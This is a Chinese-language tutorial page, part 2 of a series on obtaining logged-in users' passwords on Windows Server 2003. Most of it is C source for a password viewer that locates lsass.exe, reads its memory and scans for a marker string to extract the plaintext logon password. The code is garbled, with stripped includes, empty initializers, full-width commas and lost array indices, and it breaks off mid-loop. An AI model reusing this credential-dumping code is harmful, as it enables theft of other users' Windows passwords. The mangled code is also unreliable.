當(dāng)前位置：系統(tǒng)之家 > 系統(tǒng)教程 > 在win 2003中得到登陸用戶的密碼的三大妙法(2)

在win 2003中得到登陸用戶的密碼的三大妙法(2)

時(shí)間：2012-10-29 14:30:41 作者：木木來源：系統(tǒng)之家 1. 掃描二維碼隨時(shí)看資訊 2. 請(qǐng)使用手機(jī)瀏覽器訪問： https://m.xitongzhijia.net/xtjc/20121029/17921.html 手機(jī)查看評(píng)論反饋

　　代碼: //********************************************************************************

　　// Version: V1.0

　　// Coder: WinEggDrop

　　// Date Release: 12/15/2004

　　// Purpose: To Demonstrate Searching Logon User Password On 2003 Box，The Method

　　// Used Is Pretty Unwise，But This May Be The Only Way To Review The

　　// Logon User's Password On windows 2003.

　　// Test PlatForm: windows 2003

　　// Compiled On: VC++ 6.0

　　//********************************************************************************

　　#include

　　#define BaseAddress 0x002b5000 // The Base Memory Address To Search;The Password May Be Located Before The Address Or Far More From This Address，Which Causes The Result Unreliable

　　char Password[MAX_PATH] = ; // Store The Found Password

　　// Function ProtoType Declaration

　　//------------------------------------------------------------------------------------------------------

　　BOOL FindPassword(DWORD PID);

　　int Search(char *Buffer，const UINT nSize);

　　DWORD GetLsassPID();

　　BOOL Is2003();

　　//------------------------------------------------------------------------------------------------------

　　// End Of Fucntion ProtoType Declaration

　　int main()

　　{

　　DWORD PID = 0;

　　printf("windows 2003 Password Viewer V1.0 By WinEggDrop\n\n");

　　if (!Is2003()) // Check Out If The Box Is 2003

　　{

　　printf("The Program Can't Only Run On windows 2003 Platform\n");

　　return -1;

　　}

　　PID = GetLsassPID(); // Get The Lsass.exe PID

　　if (PID == 0) // Fail To Get PID If Returning Zerom

　　{

　　return -1;

　　}

　　FindPassword(PID); // Find The Password From Lsass.exe Memory

　　return 0;

　　}

　　// End main()

　　//------------------------------------------------------------------------------------

　　// Purpose: Search The Memory & Try To Get The Password

　　// Return Type: int

　　// Parameters:

　　// In: char *Buffer --> The Memory Buffer To Search

　　// Out: const UINT nSize --> The Size Of The Memory Buffer

　　// Note: The Program Tries To Locate The Magic String "LocalSystem Remote Procedure"，

　　// Since The Password Is Near The Above Location，But It's Not Always True That

　　// We Will Find The Magic String，Or Even We Find It，The Password May Be Located

　　// At Some Other Place.We Only Look For Luck

　　//------------------------------------------------------------------------------------

　　int Search(char *Buffer，const UINT nSize)

　　{

　　UINT OffSet = 0;

　　UINT i = 0;

　　UINT j = 0 ;

　　UINT Count = 0;

　　if (Buffer == NULL)

　　{

　　return -1;

　　}

　　for (i = 0 ; i < nSize ; i++)

　　{

　　/* The Below Is To Find The Magic String，Why So Complicated?That Will Thank MS.The Separation From Word To Word

　　Is Not Separated With A Space，But With A Ending Character，So Any Search API Like strstr() Will Fail To Locate

　　The Magic String，We Have To Do It Manually And Slowly

　　if (Buffer == 'L')

　　{

　　OffSet = 0;

　　if (strnicmp(&Buffer[i + OffSet]，"LocalSystem"，strlen("LocalSystem")) == 0)

　　{

　　OffSet += strlen("LocalSystem") + 1;

　　if (strnicmp(&Buffer[i + OffSet]，"Remote"，strlen("Remote")) == 0)

　　{

　　OffSet += strlen("Remote") + 1;

　　if (strnicmp(&Buffer[i + OffSet]，"Procedure"，strlen("Procedure")) == 0)

　　{

　　OffSet += strlen("Procedure") + 1;

　　if (strnicmp(&Buffer[i + OffSet]，"Call"，strlen("Call")) == 0)

　　{

　　i += OffSet;

　　break;

　　}

　　if (i < nSize)

　　{

　　ZeroMemory(Password，sizeof(Password));

　　for (; i < nSize ; i++)

標(biāo)簽 win 2003 登陸用戶密碼得到密碼妙法

發(fā)表評(píng)論

共0條

驗(yàn)證碼

沒有更多評(píng)論了

評(píng)論就這些咯，讓大家也知道你的獨(dú)特見解

立即評(píng)論

以上留言僅代表用戶個(gè)人觀點(diǎn)，不代表系統(tǒng)之家立場(chǎng)

在win 2003中得到登陸用戶的密碼的三大妙法(2)

相關(guān)教程

發(fā)表評(píng)論

其他版本軟件

熱門教程

人氣教程排行

服務(wù)器系統(tǒng)推薦

猜你想搜